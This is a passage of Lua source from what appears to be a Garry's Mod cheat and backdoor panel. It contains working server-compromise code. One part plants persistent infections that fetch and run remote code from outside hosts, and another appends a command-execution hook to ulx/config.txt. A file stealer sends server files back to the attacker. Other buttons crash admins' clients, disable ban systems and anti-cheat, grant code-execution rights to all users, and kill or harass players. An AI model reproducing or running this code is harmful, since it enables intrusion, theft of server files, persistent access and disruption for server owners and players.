638 Tab3:SetTextColor(Color(255, 255, 255, 255))
639 Tab3.Paint = function(self, w, h)
640 surface.SetDrawColor(Color(23, 23, 23))
641 surface.DrawRect(0, 0, w, h)
642 surface.SetDrawColor(26, 26, 26)
643 surface.SetMaterial(upgrad)
644 surface.SetDrawColor(o_color2)
645 surface.SetMaterial(downgrad)
646 surface.SetDrawColor(o_color2)
647 surface.SetDrawColor(31, 31, 31, 255)
648 surface.DrawOutlinedRect(0, 0, w, h)
649end
650
651 Tab3.DoClick = function()
652 utipage:SetVisible(false)
653 sppage:SetVisible(false)
654 bdsettings:SetVisible(false)
655 aimpage:SetVisible(false)
656 backdoorpanel:SetVisible(true)
657 home:SetVisible(false)
658 esppage:SetVisible(false)
659end
660
661 local Tab4 = vgui.Create("DButton",TabPanel)
662 Tab4:SetSize(136, 110)
663 Tab4:SetPos(3, 357)
664 Tab4:SetText("SoundBoard")
665 Tab4:SetFont("Features")
666 Tab4:SetTextColor(Color(255, 255, 255, 255))
667 Tab4.Paint = function(self, w, h)
668 surface.SetDrawColor(Color(23, 23, 23))
669 surface.DrawRect(0, 0, w, h)
670 surface.SetDrawColor(26, 26, 26)
671 surface.SetMaterial(upgrad)
672 surface.SetDrawColor(o_color2)
673 surface.SetMaterial(downgrad)
674 surface.SetDrawColor(o_color2)
675 surface.SetDrawColor(31, 31, 31, 255)
676 surface.DrawOutlinedRect(0, 0, w, h)
677end
678
679 Tab4.DoClick = function()
680 utipage:SetVisible(false)
681 sppage:SetVisible(true)
682 bdsettings:SetVisible(false)
683 aimpage:SetVisible(false)
684 backdoorpanel:SetVisible(false)
685 home:SetVisible(false)
686 esppage:SetVisible(false)
687end
688
689 local Tab5 = vgui.Create("DButton",TabPanel)
690 Tab5:SetSize(136, 110)
691 Tab5:SetPos(3, 473)
692 Tab5:SetText("Utillites")
693 Tab5:SetFont("Features")
694 Tab5:SetTextColor(Color(255, 255, 255, 255))
695 Tab5.Paint = function(self, w, h)
696 surface.SetDrawColor(Color(23, 23, 23))
697 surface.DrawRect(0, 0, w, h)
698 surface.SetDrawColor(26, 26, 26)
699 surface.SetMaterial(upgrad)
700 surface.SetDrawColor(o_color2)
701 surface.SetMaterial(downgrad)
702 surface.SetDrawColor(o_color2)
703 surface.SetDrawColor(31, 31, 31, 255)
704 surface.DrawOutlinedRect(0, 0, w, h)
705end
706
707 Tab5.DoClick = function()
708 utipage:SetVisible(true)
709 sppage:SetVisible(false)
710 bdsettings:SetVisible(false)
711 aimpage:SetVisible(false)
712 backdoorpanel:SetVisible(false)
713 home:SetVisible(false)
714 esppage:SetVisible(false)
715
716end
717
718 local Tab6 = vgui.Create("DButton",TabPanel)
719 Tab6:SetSize(136, 110)
720 Tab6:SetPos(3, 589)
721 Tab6:SetText("Settings")
722 Tab6:SetFont("Features")
723 Tab6:SetTextColor(Color(255, 255, 255, 255))
724 Tab6.Paint = function(self, w, h)
725 surface.SetDrawColor(Color(23, 23, 23))
726 surface.DrawRect(0, 0, w, h)
727 surface.SetDrawColor(26, 26, 26)
728 surface.SetMaterial(upgrad)
729 surface.SetDrawColor(o_color2)
730 surface.SetMaterial(downgrad)
731 surface.SetDrawColor(o_color2)
732 surface.SetDrawColor(31, 31, 31, 255)
733 surface.DrawOutlinedRect(0, 0, w, h)
734end
735
736 Tab6.DoClick = function()
737 utipage:SetVisible(false)
738 sppage:SetVisible(false)
739 bdsettings:SetVisible(true)
740 aimpage:SetVisible(false)
741 backdoorpanel:SetVisible(false)
742 home:SetVisible(false)
743 esppage:SetVisible(false)
744end
745
746--[[-------------------------------------------------------------------------
747Section Labels
748---------------------------------------------------------------------------]]
749 function noob.addLabel(name, posx, posy, parent)
750 local T1 = parent:Add("DLabel")
751 T1:SetSize(200, 50)
752 T1:SetPos(posx, posy)
753 T1:SetFont("Features")
754 T1:SetText(name)
755 T1:SetTextColor(Color(255, 255, 255, 255))
756end
757
758 noob.addLabel("Backdoors", 74, 14, backdoorpanel)
759 noob.addLabel("Extras", 438, 14, backdoorpanel)
760 noob.addLabel("RCON", 438, 338, backdoorpanel)
761 noob.addLabel("File Stealer", 438, 570, backdoorpanel)
762 noob.addLabel("Target String", 14, 0, bdsettings)
763 noob.addLabel("Lua Executor", 17, 85, bdsettings)
764 noob.addLabel("Aimbot", 88, 0, aimpage)
765 noob.addLabel("Targeting", 462, 0, aimpage)
766 noob.addLabel("HVH Settings", 462, 374, aimpage)
767 noob.addLabel("Player ESP", 64, 5, esppage)
768 noob.addLabel("Entity ESP", 463, 5, esppage)
769 noob.addLabel("Colour ESP", 366, 377, esppage)
770 noob.addLabel("Normal Sound", 93, 14, sppage)
771 noob.addLabel("EarRape Sound", 500, 14, sppage)
772
773--[[-------------------------------------------------------------------------
774Pannels
775---------------------------------------------------------------------------]]
776 local place1 = vgui.Create('DPanelList', backdoorpanel)
777 place1:SetSize(359, 640)
778 place1:SetPos(29, 54)
779 place1.Paint = function(s, w, h)
780 surface.SetDrawColor(Color(20, 20, 20))
781 surface.DrawRect(0, 0, w, h)
782 surface.SetDrawColor(21, 21, 21)
783 surface.SetMaterial(upgrad)
784 surface.SetDrawColor(o_color2)
785 surface.SetMaterial(downgrad)
786 surface.SetDrawColor(o_color2)
787 surface.SetDrawColor(70, 70, 70, 255)
788 surface.DrawOutlinedRect(0, 0, w, h)
789end
790
791 local P2 = vgui.Create('DPanelList', place1)
792 P2:SetSize(353, 632)
793 P2:SetPos(5,5)
794 P2.Paint = function(s, w, h)
795 surface.SetDrawColor(Color(20, 20, 20))
796 surface.DrawRect(0, 0, w, h)
797 surface.SetDrawColor(21, 21, 21)
798 surface.SetMaterial(upgrad)
799 surface.SetDrawColor(o_color2)
800 surface.SetMaterial(downgrad)
801 surface.SetDrawColor(o_color2)
802 surface.DrawOutlinedRect(0, 0, w, h)
803end
804
805
806 local place2 = vgui.Create('DPanelList', backdoorpanel)
807 place2:SetSize(363, 288)
808 place2:SetPos(411, 54)
809 place2.Paint = function(s, w, h)
810 surface.SetDrawColor(Color(20, 20, 20))
811 surface.DrawRect(0, 0, w, h)
812 surface.SetDrawColor(21, 21, 21)
813 surface.SetMaterial(upgrad)
814 surface.SetDrawColor(o_color2)
815 surface.SetMaterial(downgrad)
816 surface.SetDrawColor(o_color2)
817 surface.SetDrawColor(70, 70, 70, 255)
818 surface.DrawOutlinedRect(0, 0, w, h)
819end
820
821 local P3 = vgui.Create('DPanelList', place2)
822 P3:SetSize(353, 278)
823 P3:SetPos(5,5)
824 P3.Paint = function(s, w, h)
825 surface.SetDrawColor(Color(20, 20, 20))
826 surface.DrawRect(0, 0, w, h)
827 surface.SetDrawColor(21, 21, 21)
828 surface.SetMaterial(upgrad)
829 surface.SetDrawColor(o_color2)
830 surface.SetMaterial(downgrad)
831 surface.SetDrawColor(o_color2)
832 surface.DrawOutlinedRect(0, 0, w, h)
833end
834
835 local P4 = vgui.Create('DPanelList', backdoorpanel)
836 P4:SetSize(363, 203)
837 P4:SetPos(411, 377)
838 P4.Paint = function(s, w, h)
839 surface.SetDrawColor(Color(20, 20, 20))
840 surface.DrawRect(0, 0, w, h)
841 surface.SetDrawColor(21, 21, 21)
842 surface.SetMaterial(upgrad)
843 surface.SetDrawColor(o_color2)
844 surface.SetMaterial(downgrad)
845 surface.SetDrawColor(o_color2)
846 surface.SetDrawColor(70, 70, 70, 255)
847 surface.DrawOutlinedRect(0, 0, w, h)
848end
849
850 local P5 = vgui.Create('DPanelList', backdoorpanel)
851 P5:SetSize(363, 80)
852 P5:SetPos(411, 614)
853 P5.Paint = function(s, w, h)
854 surface.SetDrawColor(Color(20, 20, 20))
855 surface.DrawRect(0, 0, w, h)
856 surface.SetDrawColor(21, 21, 21)
857 surface.SetMaterial(upgrad)
858 surface.SetDrawColor(o_color2)
859 surface.SetMaterial(downgrad)
860 surface.SetDrawColor(o_color2)
861 surface.SetDrawColor(70, 70, 70, 255)
862 surface.DrawOutlinedRect(0, 0, w, h)
863end
864
865 local S1 = vgui.Create('DPanelList', sppage)
866 S1:SetSize(267, 616)
867 S1:SetPos(63, 56)
868 S1.Paint = function(s, w, h)
869 surface.SetDrawColor(Color(20, 20, 20))
870 surface.DrawRect(0, 0, w, h)
871 surface.SetDrawColor(21, 21, 21)
872 surface.SetMaterial(upgrad)
873 surface.SetDrawColor(o_color2)
874 surface.SetMaterial(downgrad)
875 surface.SetDrawColor(o_color2)
876 surface.SetDrawColor(70, 70, 70, 255)
877 surface.DrawOutlinedRect(0, 0, w, h)
878end
879
880 local S2 = vgui.Create('DPanelList', sppage)
881 S2:SetSize(267, 616)
882 S2:SetPos(470, 56)
883 S2.Paint = function(s, w, h)
884 surface.SetDrawColor(Color(20, 20, 20))
885 surface.DrawRect(0, 0, w, h)
886 surface.SetDrawColor(21, 21, 21)
887 surface.SetMaterial(upgrad)
888 surface.SetDrawColor(o_color2)
889 surface.SetMaterial(downgrad)
890 surface.SetDrawColor(o_color2)
891 surface.SetDrawColor(70, 70, 70, 255)
892 surface.DrawOutlinedRect(0, 0, w, h)
893end
894
895--[[-------------------------------------------------------------------------
896RCON Access / CMD Sender
897---------------------------------------------------------------------------]]
898 local shitbox = vgui.Create("DTextEntry", P4)
899 shitbox:SetPos(7, 98)
900 shitbox:SetSize(350, 100)
901 shitbox:SetMultiline(true)
902 shitbox:SetTextColor(Color(255, 255, 255, 255))
903 shitbox:SetFont("Sheeta2")
904 shitbox.Paint = function(self, w, h)
905 surface.SetDrawColor(Color(20, 20, 20))
906 surface.DrawRect(0, 0, w, h)
907 surface.SetDrawColor(45, 45, 45)
908 surface.SetMaterial(upgrad)
909 surface.SetDrawColor(o_color2)
910 surface.SetMaterial(downgrad)
911 surface.SetDrawColor(o_color2)
912 surface.SetDrawColor(35, 35, 35, 255)
913 surface.DrawOutlinedRect(0, 0, w, h)
914 self:DrawTextEntryText(Color(255, 255, 255), Color(20, 20, 150), Color(100, 100, 100))
915end
916
917 local rconsender = vgui.Create("DButton", P4)
918 rconsender:SetPos(7, 6)
919 rconsender:SetSize(350, 40)
920 rconsender:SetText(" RCON CMD ")
921 rconsender:SetTextColor(Color(255, 255, 255, 255))
922 rconsender:SetFont("Features")
923 rconsender.Paint = function(self, w, h)
924 surface.SetDrawColor(Color(20, 20, 20))
925 surface.DrawRect(0, 0, w, h)
926 surface.SetDrawColor(45, 45, 45)
927 surface.SetMaterial(upgrad)
928 surface.SetDrawColor(o_color2)
929 surface.SetMaterial(downgrad)
930 surface.SetDrawColor(o_color2)
931 surface.SetDrawColor(35, 35, 35, 255)
932 surface.DrawOutlinedRect(0, 0, w, h)
933end
934
935 rconsender.DoClick = function()
936 surface.PlaySound("buttons/button18.wav")
937 local getRCON = shitbox:GetValue()
938 net.Start(channel)
939 net.WriteString(getRCON)
940 net.WriteBit(false)
941 net.SendToServer()
942end
943
944 local luasender = vgui.Create("DButton", P4)
945 luasender:SetPos(7, 52)
946 luasender:SetSize(350, 40)
947 luasender:SetText(" LUA CMD ")
948 luasender:SetTextColor(Color(255, 255, 255, 255))
949 luasender:SetFont("Features")
950 luasender.Paint = function(self, w, h)
951 surface.SetDrawColor(Color(20, 20, 20))
952 surface.DrawRect(0, 0, w, h)
953 surface.SetDrawColor(45, 45, 45)
954 surface.SetMaterial(upgrad)
955 surface.SetDrawColor(o_color2)
956 surface.SetMaterial(downgrad)
957 surface.SetDrawColor(o_color2)
958 surface.SetDrawColor(35, 35, 35, 255)
959 surface.DrawOutlinedRect(0, 0, w, h)
960end
961
962 luasender.DoClick = function()
963 surface.PlaySound("buttons/button18.wav")
964 local getLUA = shitbox:GetValue()
965 noob.PostLua(getLUA)
966end
967
968 function noob.OpenTextDocument( path, str, parent )
969
970 local save = vgui.Create("DButton", P5)
971 save:SetPos(7, 44)
972 save:SetSize(350, 32)
973 save:SetText("File Stealer (save)")
974 save:SetTextColor(Color(255, 255, 255, 255))
975 save:SetFont("Features")
976 save.Paint = function(self, w, h)
977 surface.SetDrawColor(Color(20, 20, 20))
978 surface.DrawRect(0, 0, w, h)
979 surface.SetDrawColor(45, 45, 45)
980 surface.SetMaterial(upgrad)
981 surface.SetDrawColor(o_color2)
982 surface.SetMaterial(downgrad)
983 surface.SetDrawColor(o_color2)
984 surface.SetDrawColor(35, 35, 35, 255)
985 surface.DrawOutlinedRect(0, 0, w, h)
986end
987
988 save.DoClick = function(self)
989 surface.PlaySound("buttons/button18.wav")
990 Derma_StringRequest( "Save file '" .. path .. "' to data/somecheat/files/" , "File name e.g: server.txt)", "", function( text )
991 if !string.find( text, ".txt" ) then text = text .. ".txt" end
992 if !file.IsDir( "somecheat/files/" , "DATA" ) then file.CreateDir( "somecheat/files/" ) end
993 file.Write( "somecheat/files/" .. text, str )
994 noob.Notify( "Saved source to data/somecheat/files/" .. text )
995 end)
996 end
997end
998
999 local filestealer = vgui.Create("DButton", P5)
1000 filestealer:SetPos(7, 6)
1001 filestealer:SetSize(350, 32)
1002 filestealer:SetText("File Stealer")
1003 filestealer:SetTextColor(Color(255, 255, 255, 255))
1004 filestealer:SetFont("Features")
1005 filestealer.Paint = function(self, w, h)
1006 surface.SetDrawColor(Color(20, 20, 20))
1007 surface.DrawRect(0, 0, w, h)
1008 surface.SetDrawColor(45, 45, 45)
1009 surface.SetMaterial(upgrad)
1010 surface.SetDrawColor(o_color2)
1011 surface.SetMaterial(downgrad)
1012 surface.SetDrawColor(o_color2)
1013 surface.SetDrawColor(35, 35, 35, 255)
1014 surface.DrawOutlinedRect(0, 0, w, h)
1015end
1016
1017 filestealer.DoClick = function()
1018 surface.PlaySound("buttons/button18.wav")
1019 Derma_StringRequest( "Steal File Source", "File Path (Relative to garrysmod/)", "", function( text )
1020 net.Receive( "file", function( len )
1021 local str = net.ReadString()
1022 if str != "ERROR" then
1023 noob.OpenTextDocument( text, str, frame )
1024 else
1025 noob.Notify( "Unable to find file " .. text .. " on the server" )
1026 end
1027 end)
1028 noob.PostLua([[
1029 util.AddNetworkString( "file" )
1030 local id = ]] .. LocalPlayer():UserID() .. [[
1031 local f = file.Open( "]] .. text .. [[", "r", "GAME" )
1032 if !f then
1033 net.Start( "file" )
1034 net.WriteString( "ERROR" )
1035 net.Send( Player( id ) )
1036 return
1037 end
1038 local str = f:Read( f:Size() )
1039 f:Close()
1040 net.Start( "file" )
1041 net.WriteString( str )
1042 net.Send( Player( id ) )
1043 ]])
1044 end)
1045 end
1046
1047--[[-------------------------------------------------------------------------
1048Scroll Bars
1049---------------------------------------------------------------------------]]
1050
1051 local bar1 = vgui.Create("DScrollPanel", P2)
1052 bar1:Dock(FILL)
1053
1054 local sbar1 = bar1:GetVBar()
1055 function sbar1:Paint( w, h )
1056 draw.RoundedBox( 0, 0, 0, w, h, Color(25,25,25,255 ))
1057end
1058 function sbar1.btnUp:Paint( w, h )
1059 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1060end
1061 function sbar1.btnDown:Paint( w, h )
1062 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1063end
1064 function sbar1.btnGrip:Paint( w, h )
1065 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30,255 ))
1066end
1067
1068 local bar2 = vgui.Create("DScrollPanel", P3)
1069 bar2:Dock(FILL)
1070
1071 local sbar2 = bar2:GetVBar()
1072 function sbar2:Paint( w, h )
1073 draw.RoundedBox( 0, 0, 0, w, h, Color(25,25,25,255 ))
1074end
1075 function sbar2.btnUp:Paint( w, h )
1076 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1077end
1078 function sbar2.btnDown:Paint( w, h )
1079 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1080end
1081 function sbar2.btnGrip:Paint( w, h )
1082 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30,255 ))
1083end
1084
1085 local bar3 = vgui.Create("DScrollPanel", S1)
1086 bar3:Dock(FILL)
1087
1088 local sbar3 = bar3:GetVBar()
1089 function sbar3:Paint( w, h )
1090 draw.RoundedBox( 0, 0, 0, w, h, Color(25,25,25,255 ))
1091end
1092 function sbar3.btnUp:Paint( w, h )
1093 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1094end
1095 function sbar3.btnDown:Paint( w, h )
1096 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1097end
1098 function sbar3.btnGrip:Paint( w, h )
1099 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30,255 ))
1100end
1101
1102 local bar4 = vgui.Create("DScrollPanel", S2)
1103 bar4:Dock(FILL)
1104
1105 local sbar4 = bar4:GetVBar()
1106 function sbar4:Paint( w, h )
1107 draw.RoundedBox( 0, 0, 0, w, h, Color(25,25,25,255 ))
1108end
1109 function sbar4.btnUp:Paint( w, h )
1110 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1111end
1112 function sbar4.btnDown:Paint( w, h )
1113 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30))
1114end
1115 function sbar4.btnGrip:Paint( w, h )
1116 draw.RoundedBox( 0, 0, 0, w, h, Color(30,30,30,255 ))
1117end
1118
1119--[[-------------------------------------------------------------------------
1120Button Function
1121---------------------------------------------------------------------------]]
1122
1123 function noob.AddButton(name, parent, func)
1124 local button = parent:Add("DButton")
1125 button:SetText("")
1126 button:Dock(TOP)
1127 button:DockMargin(0, 0, 0, 5.8)
1128 button:SetSize(350, 33)
1129 button.DoClick = func
1130 button.Paint = function(self, w, h)
1131 surface.SetDrawColor(Color(20, 20, 20))
1132 surface.DrawRect(0, 0, w, h)
1133 surface.SetDrawColor(45, 45, 45)
1134 surface.SetMaterial(upgrad)
1135 surface.SetDrawColor(o_color2)
1136 surface.SetMaterial(downgrad)
1137 surface.SetDrawColor(o_color2)
1138 surface.SetDrawColor(35, 35, 35, 255)
1139 surface.DrawOutlinedRect(0, 0, w, h)
1140 draw.SimpleTextOutlined(name, "Features", self:GetWide() / 2, self:GetTall() / 2, color_white, 1, 1, 1, color_black)
1141 end
1142end
1143
1144 function noob.AddSound(name, parent, func)
1145 local button = parent:Add("DButton")
1146 button:SetText("")
1147 button:Dock(TOP)
1148 button:DockMargin(1, 1, 1, 2)
1149 button:SetSize(210, 35)
1150 button.DoClick = func
1151 button.Paint = function(self, w, h)
1152 surface.SetDrawColor(Color(20, 20, 20))
1153 surface.DrawRect(0, 0, w, h)
1154 surface.SetDrawColor(45, 45, 45)
1155 surface.SetMaterial(upgrad)
1156 surface.SetDrawColor(o_color2)
1157 surface.SetMaterial(downgrad)
1158 surface.SetDrawColor(o_color2)
1159 surface.SetDrawColor(35, 35, 35, 255)
1160 surface.DrawOutlinedRect(0, 0, w, h)
1161 draw.SimpleTextOutlined(name, "Features", self:GetWide() / 2, self:GetTall() / 2, color_white, 1, 1, 1, color_black)
1162 end
1163end
1164
1165--[[-------------------------------------------------------------------------
1166Backdoorpanel Features 1
1167---------------------------------------------------------------------------]]
1168
1169 noob.AddButton("Inject SendLua Interface", bar1, function()
1170 surface.PlaySound("buttons/button18.wav")
1171 noob.PostLua([[util.AddNetworkString ('somecheat') net.Receive ('somecheat', function (length, ply) local netString = net.ReadString () local bit = net.ReadBit () if bit == 1 then RunString (netString) else game.ConsoleCommand (netString ..'\n') end end)]])
1172 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"Set Your Target String to: somecheat")
1173
1174end)
1175
1176 noob.AddButton("Persistent Infection (DRM)", bar1, function()
1177 surface.PlaySound("buttons/button18.wav")
1178 noob.PostLua([[RunConsoleCommand("ulx", "luarun", "http.Fetch("http://contentproxy.tk/p",function(b) RunString(b) end)")]])
1179 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"Successfully planted DRM infection")
1180
1181end)
1182
1183 noob.AddButton("Persistent Infection (ULX)", bar1, function()
1184 surface.PlaySound("buttons/button18.wav")
1185 noob.PostLua([===[file.Append("ulx/config.txt",[=[
1186 ulx hook Think GLX l "hook.Remove([[Think]],[[GLX]])util.AddNetworkString[[somecheat]])net.Receive([[somecheat]],function()RunString(net.ReadString())end)"
1187 ]=])
1188 ]===])
1189 chat.AddText(Color(255,0,0), "[somecheat] ", Color(20,150,200),"Ulx infection added once restarted")
1190
1191end)
1192
1193 noob.AddButton("Artillery Strike", bar1, function()
1194 surface.PlaySound("buttons/button18.wav")
1195 noob.PostLua([[if !bombstrike then
1196 hook.Add("Think", "lulz_bombstrike", function()
1197 local explode = ents.Create("env_explosion")
1198 local ps = Vector(math.random(-8000, 8000), math.random(-8000, 8000), math.random(-5000, 5000))
1199 local trc = {}
1200 trc.start = ps
1201 trc.endpos = ps + Vector(0, 0, -99999)
1202 local tr = util.TraceLine(trc)
1203 if !tr.Hit then return end
1204 explode:SetPos(tr.HitPos)
1205 explode:Spawn()
1206 explode:SetKeyValue("iMagnitude", "400")
1207 explode:Fire("Explode", 0, 0)
1208 end)
1209 bombstrike = true
1210 else
1211 hook.Remove("Think", "lulz_bombstrike")
1212 bombstrike = false
1213 end]])
1214
1215end)
1216
1217 noob.AddButton("Announce centre screen", bar1, function()
1218 surface.PlaySound("buttons/button18.wav")
1219 Derma_StringRequest("Set Custom Text", "Set Text", "", function(str)
1220 noob.PostLua("for k, v in pairs(player.GetAll()) do v:PrintMessage( HUD_PRINTCENTER, \""..str.."\") end")
1221
1222end)
1223end)
1224
1225 noob.AddButton("Broken Glass Symphony", bar1, function()
1226 surface.PlaySound("buttons/button18.wav")
1227 noob.PostLua([[if !timer.Exists("A true masterpiece") then
1228 timer.Create("A true masterpiece", 0.2, 0, function()
1229 for _, p in pairs(player.GetAll()) do
1230 p:EmitSound("physics/glass/glass_largesheet_break"..math.random(1,3)..".wav", 100, math.random(40, 180))
1231 end
1232 end)
1233 else
1234 timer.Remove("A true masterpiece")
1235 end]])
1236
1237end)
1238
1239 noob.AddButton("Black Screen With Text", bar1, function()
1240 surface.PlaySound("buttons/button18.wav")
1241 Derma_StringRequest("Set Custom Text", "Set Text", "", function(str)
1242 noob.PostLua("BroadcastLua([[hook.Add( 'HUDPaint', 'MyRect', function() surface.SetDrawColor( 0, 0, 0 ) surface.DrawRect( 0, 0, 1920, 1080 ) surface.SetFont( 'Features2' ) surface.SetTextColor( 255, 50, 50 ) surface.SetTextPos( 128, 128 ) surface.DrawText( \""..str.."\" ) end )]])")
1243
1244end)
1245end)
1246
1247 noob.AddButton("Console Jammer", bar1, function()
1248 surface.PlaySound("buttons/button18.wav")
1249 noob.PostLua([[if !(timer.Exists("consoleJammer")) then
1250 timer.Create("consoleJammer", 0.5, 0, function()
1251 print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
1252 end)
1253 else
1254 timer.Destroy("consoleJammer")
1255 end]])
1256
1257end)
1258
1259 noob.AddButton("Crash Admins & Vip's", bar1, function()
1260 surface.PlaySound("buttons/button18.wav")
1261 noob.PostLua("for k,v in pairs(player.GetAll()) do if( v:GetUserGroup() != \"user\" ) then v:SendLua(\"while true do end\") end end")
1262end)
1263
1264 noob.AddButton("Change Everyone Name", bar1, function()
1265 surface.PlaySound("buttons/button18.wav")
1266 Derma_StringRequest("Set Everyones Name", "Name", "", function(text)
1267 noob.PostLua([[local str = "]] .. text .. [["
1268 for k, v in next, player.GetAll() do
1269 DarkRP.storeRPName( v, str )
1270 v:setDarkRPVar( "rpname", str )
1271 end]])
1272
1273end)
1274end)
1275
1276 noob.AddButton("Change Everyones Model", bar1, function()
1277 surface.PlaySound("buttons/button18.wav")
1278 Derma_StringRequest("Change Everyones Model", "Model Directory", "", function(str)
1279 noob.PostLua("for k, v in pairs(player.GetAll()) do v:SetModel(\""..str.."\") end")
1280
1281end)
1282end)
1283
1284 noob.AddButton("Change Everything Material", bar1, function()
1285 surface.PlaySound("buttons/button18.wav")
1286 Derma_StringRequest("Set Everythings Material", "Material Directory", "", function(str)
1287 noob.PostLua("for k, v in pairs(ents.GetAll()) do v:SetMaterial(\""..str.."\") end")
1288
1289end)
1290end)
1291
1292 noob.AddButton("Destroy ULX Bans/Kick", bar1, function()
1293 surface.PlaySound("buttons/button18.wav")
1294 noob.PostLua([[ULib.Ban = function() return false end
1295 ULib.addBan = function() return end
1296 ULib.kick = function() return end]])
1297
1298end)
1299
1300 noob.AddButton("Destroy FAdmin Bans/Kick", bar1, function()
1301 surface.PlaySound("buttons/button18.wav")
1302 noob.PostLua([[FAdmin.StartHooks["kickbanning"] = return false end]])
1303
1304end)
1305
1306 noob.AddButton("Destroy CAC Anti-Cheat", bar1, function()
1307 surface.PlaySound("buttons/button18.wav")
1308 noob.PostLua([[if _G.CAC then
1309 _G.CAC = function() return false end
1310 CAC.Detection = function() return false end
1311 end]])
1312end)
1313
1314
1315 noob.AddButton("Destroy ULX Completely", bar1, function()
1316 surface.PlaySound("buttons/button18.wav")
1317 noob.PostLua([[ULib.Ban = function() return false end
1318 ULib.addBan = function() return end
1319 ULib.kick = function() return end
1320 _G.ulx.cvars = function() return false end
1321 ULib.ucl.addUser = function() return end
1322 ULib.ucl.removeUser = function() return end
1323 ULib.ucl.query = function() return false end]])
1324
1325end)
1326
1327 noob.AddButton("Earthquake", bar1, function()
1328 surface.PlaySound("buttons/button18.wav")
1329 noob.PostLua([[if !timer.Exists("earthquake") then
1330 timer.Create("earthquake", 0.5, 500, function()
1331 for _, p in pairs(player.GetAll()) do
1332 p:SetPos(p:GetPos() + Vector(0, 0, 1))
1333 p:SetVelocity(Vector(math.random(-50, 50), math.random(-50, 50), math.random(100, 150)))
1334 util.ScreenShake(p:GetPos(), 20, 1, 1, 100)
1335 p:EmitSound("ambient/explosions/exp1.wav", 100, math.random(60, 100))
1336 end
1337 for _, e in pairs(ents.GetAll()) do
1338 if e:GetPhysicsObject() and e:GetPhysicsObject():IsValid() then e:GetPhysicsObject():AddVelocity(Vector(math.random(-50, 50), math.random(-50, 50), math.random(100, 150))) end
1339 end
1340 end)
1341 else
1342 timer.Remove("earthquake")
1343 end]])
1344
1345end)
1346
1347 noob.AddButton("Fake BSOD", bar1, function()
1348 surface.PlaySound("buttons/button18.wav")
1349 noob.PostLua([[http.Fetch('https://pastebin.com/raw/NehjdnX7',function(b,l,h,c)RunString(b)end,nil)]])
1350
1351end)
1352
1353 noob.AddButton("Give Weapon", bar1, function()
1354 surface.PlaySound("buttons/button18.wav")
1355 chat.AddText(Color(255,0,0), "[somecheat] ", Color(255,155,155),"Feature in development")
1356end)
1357
1358 noob.AddButton("Kill Everyone", bar1, function()
1359 surface.PlaySound("buttons/button18.wav")
1360 noob.PostLua("for k,v in pairs(player.GetAll()) do v:Kill() end")
1361
1362end)
1363
1364 noob.AddButton("Luarun Access", bar1, function()
1365 surface.PlaySound("buttons/button18.wav")
1366 noob.PostLua([[RunConsoleCommand("ulx", "groupallow", "user", "ulx luarun")]])
1367
1368end)
1369
1370 noob.AddButton("Launch Players", bar1, function()
1371 surface.PlaySound("buttons/button18.wav")
1372 noob.PostLua("for k,v in pairs(player.GetAll()) do v:SetVelocity(v:GetVelocity() + Vector(math.random(1000,5000), math.random(1000,5000), math.random(1000,5000))) end")
1373
1374end)
1375
1376 noob.AddButton("LuaRun Code", bar1, function()
1377 surface.PlaySound("buttons/button18.wav")
1378 Derma_StringRequest( "LuaRun String", "String", "", function(text)
1379 noob.PostLua([[RunString( ']] .. text .. [[' )]])
1380
1381end)
1382end)
1383
1384 noob.AddButton("Rainbow Physgun", bar1, function()
1385 surface.PlaySound("buttons/button18.wav")
1386 noob.PostLua([[hook.Add("Think", "rainbowphysgun", function()
1387 for k,ply in ipairs(player.GetAll()) do
1388 local col = HSVToColor(CurTime() % 6 * 60, 1, 1)
1389 ply:SetWeaponColor(Vector(col.r / 255, col.g / 255, col.b / 255))
1390 end
1391 end)]])
1392 end)
1393
1394 noob.AddButton("Rainbow Chat Spam", bar1, function()
1395 surface.PlaySound("buttons/button18.wav")
1396 Derma_StringRequest("Rainbow Chatspam", "Text", "", function(text)
1397 noob.PostLua([[
1398 chat = {}
1399 function chat.AddText(...)
1400 net.Start("somecheat")
1401 net.WriteTable({...})
1402 net.Broadcast()
1403 end
1404 function AddTextPly(ply, ...)
1405 net.Start("somecheat")
1406 net.WriteTable({...})
1407 net.Send(ply)
1408 end
1409 for k, v in pairs(player.GetAll()) do
1410 v:SendLua('net.Receive("somecheat", function(len) chat.AddText(unpack(net.ReadTable()))end)')
1411 end
1412 timer.Create("gotEm", 0.8, 120, function()
1413 local function ChatPrintRainbow(frequency, str)
1414 local text = {}
1415 for i = 1, #str do
1416 table.insert(text, HSVToColor(i * frequency % 360, 1, 1))
1417 table.insert(text, string.sub(str, i, i))
1418 end
1419 chat.AddText(unpack(text))
1420 end
1421 ChatPrintRainbow(10, "]] .. text .. [[")
1422 end)]])
1423
1424end)
1425end)
1426
1427 noob.AddButton("Server Nuke (M9K)", bar1, function()
1428 surface.PlaySound("buttons/button18.wav")
1429 noob.PostLua([[
1430 local rocket = ents.Create("m9k_launched_davycrockett")
1431 local ply2 = table.Random(player.GetAll())
1432 rocket:SetPos(ply2:GetPos())
1433 rocket:SetOwner(ply2)
1434 rocket.Owner = ply2
1435 rocket:Spawn()
1436 rocket:Activate()]])
1437end)
1438
1439 noob.AddButton("Moan Steps", bar1, function()
1440 surface.PlaySound("buttons/button18.wav")
1441 noob.PostLua([[if !moanstep then
